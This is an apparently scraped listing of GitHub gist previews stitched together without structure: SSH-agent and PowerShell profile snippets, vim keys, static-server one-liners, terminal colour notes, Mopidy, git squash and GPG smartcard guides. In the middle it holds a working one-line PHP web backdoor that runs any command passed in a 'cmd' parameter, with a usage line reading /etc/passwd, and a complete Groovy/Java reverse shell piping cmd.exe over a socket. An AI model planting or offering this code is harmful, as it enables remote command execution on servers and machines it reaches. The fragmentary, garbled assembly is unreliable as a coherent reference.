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# SSH Agent Functions
# Mark Embling (http://www.markembling.info/)
#
# How to use:
# - Place this file into %USERPROFILE%\Documents\WindowsPowershell (or location of choice)
# - Import into your profile.ps1:
# e.g. ". (Resolve-Path ~/Documents/WindowsPowershell/ssh-agent-utils.ps1)" [without quotes]
# - Enjoy
#
# Note: ensure you have ssh and ssh-agent available on your path, from Git's Unix tools or Cygwin.

Introduction

  • C-a == Ctrl-a
  • M-a == Alt-a

General

:q        close
:w        write/saves
:wa[!]    write/save all windows [force]
:wq       write/save and close
@hoest
hoest / profile.ps1
Created October 23, 2012 11:47
Keep Powershell history
# profile folder
$profileFolder = split-path $profile
# save last 100 history items on exit; with the 'exit' command
$historyPath = Join-Path $profileFolder "ps_history.xml"
# hook powershell's exiting event and hide the registration with -supportevent.
Register-EngineEvent -SourceIdentifier powershell.exiting -SupportEvent -Action {
Get-History -Count 100 | Export-Clixml (Join-Path $profileFolder "ps_history.xml") }
@willurd
willurd / web-servers.md
Last active May 6, 2024 13:43
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@XVilka
XVilka / TrueColour.md
Last active April 8, 2024 14:02
True Colour (16 million colours) support in various terminal applications and terminals

THIS GIST WAS MOVED TO TERMSTANDARD/COLORS REPOSITORY.

PLEASE ASK YOUR QUESTIONS OR ADD ANY SUGGESTIONS AS A REPOSITORY ISSUES OR PULL REQUESTS INSTEAD!

@bitjockey42
bitjockey42 / mopidy.md
Created April 20, 2014 16:39
An installation and setup guide for mopidy on Arch Linux.

Mopidy on Arch Linux

mopidy

Installation

Install from the AUR.

<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@longtimeago
longtimeago / squash-commits.md
Last active April 1, 2024 20:44
How to squash commits in a GitHub pull request

How to squash commits in a GitHub pull request

o you've contributed some code to an open source project, say, Rails. And they'd like you to squash all of the commits in your pull request. But you're not a git wizard; how do you make this happen?

Normally, you'd do something like this. I'm assuming upstream is a git remote that is pointing at the official project repository, and that your changes are in your 'omgpull' branch:

@btcdrak
btcdrak / openpgp-card-guide.md
Created September 1, 2016 21:31 — forked from ageis/openpgp-card-guide.md
Quick GPG Smartcard Guide

Quick GPG Smartcard Guide

We will generate a master key with only the Certify capability and three subkeys with each of the Sign, Encrypt and Authenticate capabilities. These latter three keys are meant for daily use and will be transferred to an OpenPGP smartcard, which has three corresponding slots. The master private key can then be moved to offline cold storage, or stored on a second smartcard.

We are generating keys on a secure computer instead of on the card, because it allows more flexibility. Ideally this means a machine running Tails or one that is air-gapped and not connected to the internet.

This guide assumes that if you want to sign other peoples keys, then you will require the aforementioned secondary smartcard with your master key stored in its Signature slot, or if you only have one smartcard, then you'll have to fetch the master key out of cold storage. By default, GPG generates a master key with the Certify and